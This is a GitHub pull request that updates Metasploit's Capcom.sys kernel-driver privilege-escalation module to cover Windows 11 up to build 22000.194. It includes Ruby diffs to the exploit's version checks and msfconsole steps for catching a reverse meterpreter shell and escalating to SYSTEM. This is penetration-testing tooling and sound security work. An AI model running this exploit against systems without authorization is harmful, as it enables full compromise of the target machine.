### PR TITLE
fix #15890: Support Windows 11 in Capcom.sys LPE Module

### DIFF
--- a/modules/exploits/windows/local/capcom_sys_exec.rb
+++ b/modules/exploits/windows/local/capcom_sys_exec.rb
@@ -10,6 +10,7 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::Windows::Priv
   include Msf::Post::Windows::Process
   include Msf::Post::Windows::ReflectiveDLLInjection
+  prepend Msf::Remote::Exploit::AutoCheck
 
   def initialize(info = {})
     super(
@@ -66,6 +67,11 @@ class MetasploitModule < Msf::Exploit::Local
     version = get_version_info
     if version.build_number < Msf::WindowsVersion::Win7_SP0 || version.windows_server?
       return Exploit::CheckCode::Unknown
+    end
+
+    # These versions of Windows 11 come built in with a driver block list preventing loading of capcom.sys
+    if version.build_number > Rex::Version.new('10.0.22000.194')
+      return Exploit::CheckCode::Safe('Target contains a block list which prevents the vulnerable driver from being loaded!')
     end
 
     if sysinfo['Architecture'] != ARCH_X64

--- a/modules/exploits/windows/local/capcom_sys_exec.rb
+++ b/modules/exploits/windows/local/capcom_sys_exec.rb
@@ -22,6 +22,7 @@ class MetasploitModule < Msf::Exploit::Local
             arbitrary function to be executed in the kernel from user land. This function
             purposely disables SMEP prior to invoking a function given by the caller.
             This has been tested on Windows 7, 8.1, 10 (x64) and Windows 11 (x64) upto build 22000.194.
+            Note that builds after 22000.194 contain deny lists that prevent this driver from loading.
           },
           'License' => MSF_LICENSE,
           'Author' => [
@@ -35,7 +36,7 @@ class MetasploitModule < Msf::Exploit::Local
             'EXITFUNC' => 'thread'
           },
           'Targets' => [
-            [ 'Windows x64 (<= 10)', { 'Arch' => ARCH_X64 } ]
+            [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
           ],
           'Payload' => {
             'Space' => 4096,

--- a/modules/exploits/windows/local/capcom_sys_exec.rb
+++ b/modules/exploits/windows/local/capcom_sys_exec.rb
@@ -10,7 +10,7 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::Windows::Priv
   include Msf::Post::Windows::Process
   include Msf::Post::Windows::ReflectiveDLLInjection
-  prepend Msf::Remote::Exploit::AutoCheck
+  prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
     super(

--- a/modules/exploits/windows/local/capcom_sys_exec.rb
+++ b/modules/exploits/windows/local/capcom_sys_exec.rb
@@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Local
             This module abuses the Capcom.sys kernel driver's function that allows for an
             arbitrary function to be executed in the kernel from user land. This function
             purposely disables SMEP prior to invoking a function given by the caller.
-            This has been tested on Windows 7, 8.1 and Windows 10 (x64).
+            This has been tested on Windows 7, 8.1, 10 (x64) and Windows 11 (x64) upto build 22000.194.
           },
           'License' => MSF_LICENSE,
           'Author' => [
@@ -60,6 +60,8 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
+    return Exploit::CheckCode::Unknown unless session.platform == 'windows'
+
     version = get_version_info
     if version.build_number < Msf::WindowsVersion::Win7_SP0 || version.windows_server?
       return Exploit::CheckCode::Unknown


### PR DESCRIPTION
Closes #15890  

This pull request is a fix for the issue #15890  meant for the module `modules/exploits/windows/local/capcom_sys_exec.rb`. Earlier the version check for the module relied on `sysinfo` and checked the version number to verify compatibility. Now the version check is updated to use @smashery implementation over at #17336 and the module is tested with the vulnerability in `Windows 11 (build 22000.194)` to verify its functionality for that particular platform. After the verification the description comments are updated accordingly.

## Verification

Following were the steps followed to check the expected results

- [x] Start `msfconsole`
- [x] `use multi/handler`
- [x] `set payload <the payload used>`
- [x] `set LHOST <the interface ip>`
- [x] `set LPORT <the port used in the payload>`
- [x] `run`
- [x] Obtain a reverse meterpreter shell and background it using Ctrl+Z and y.
- [x] `sessions` Note down the session number to use later.
- [x] `use windows/local/capcom_sys_exec`
- [x] `set session <the session number obtained before>`
- [x] `set LHOST <the interface ip>`
- [x] `set LPORT <the desired port>`
- [x] `run`

The exploit works as expected. The reverse meterpreter shell is obtained with system privileges.

Windows version tested on.
![image](https://user-images.githubusercontent.com/57354589/212333978-87bad344-f35b-4639-a005-04b37d436817.png)

The output
![image](https://user-images.githubusercontent.com/57354589/212334225-b16be84c-48a9-4ca2-8eba-5d7f2506252f.png)